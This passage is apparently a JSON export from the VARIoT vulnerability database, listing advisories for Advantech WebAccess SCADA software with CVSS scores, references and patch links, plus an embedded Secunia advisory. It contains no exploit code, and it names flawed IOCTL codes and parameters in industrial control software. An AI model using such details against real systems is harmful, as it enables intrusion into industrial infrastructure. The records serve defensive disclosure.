Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-148" } ], "trust": 0.7 } }
var-201801-1869
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2721 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to using it as a memory address in a free operation. An attacker can leverage this functionality to execute code under the context of Administrator.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-063" } ] }, "credits": { "_id": null, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-18-063" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "ZDI-18-063", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-18-063", "trust": 0.7, "value": "MEDIUM" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-063" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2721 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to using it as a memory address in a free operation. An attacker can leverage this functionality to execute code under the context of Administrator.", "sources": [ { "db": "ZDI", "id": "ZDI-18-063" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-5066", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-063", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-063" } ] }, "id": "VAR-201801-1869", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:52:35.867000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-063" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-063" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-18-063", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-063", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-063", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess webvrpcs drawsrv Arbitrary Free Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-18-063" } ], "trust": 0.7 } }
var-201202-0217
Vulnerability from variot
Advantech/BroadWin WebAccess before 7.0 allows remote attackers to (1) enable date and time syncing or (2) disable date and time syncing via a crafted URL. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0217", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0666" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "db": "CNNVD", "id": "CNNVD-201202-413" }, { "db": "NVD", "id": "CVE-2012-0237" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001555" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0237", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2012-0237", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-53518", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0237", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-0237", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201202-413", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-53518", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53518" }, { "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "db": "CNNVD", "id": "CNNVD-201202-413" }, { "db": "NVD", "id": "CVE-2012-0237" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess before 7.0 allows remote attackers to (1) enable date and time syncing or (2) disable date and time syncing via a crafted URL. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0237" }, { "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "db": "CNVD", "id": "CNVD-2012-0666" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53518" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0237", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-413", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0666", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001555", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "19E4D7F2-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53518", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0666" }, { "db": "VULHUB", "id": "VHN-53518" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-413" }, { "db": "NVD", "id": "CVE-2012-0237" } ] }, "id": "VAR-201202-0217", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0666" }, { "db": "VULHUB", "id": "VHN-53518" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0666" } ] }, "last_update_date": "2024-11-23T21:46:30.853000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Vulnerability (CNVD-2012-0666)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10232" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0666" }, { "db": "JVNDB", "id": "JVNDB-2012-001555" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53518" }, { "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "db": "NVD", "id": "CVE-2012-0237" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0237" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0237" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0666" }, { "db": "VULHUB", "id": "VHN-53518" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-413" }, { "db": "NVD", "id": "CVE-2012-0237" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0666" }, { "db": "VULHUB", "id": "VHN-53518" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-413" }, { "db": "NVD", "id": "CVE-2012-0237" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0666" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53518" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-413" }, { "date": "2012-02-21T13:31:57.063000", "db": "NVD", "id": "CVE-2012-0237" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0666" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53518" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001555" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-413" }, { "date": "2024-11-21T01:34:38.380000", "db": "NVD", "id": "CVE-2012-0237" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-413" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Vulnerabilities that change the date and time synchronization settings", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001555" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "19e4d7f2-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-413" } ], "trust": 0.8 } }
var-201602-0481
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C74 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strncpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0481", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-140" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { 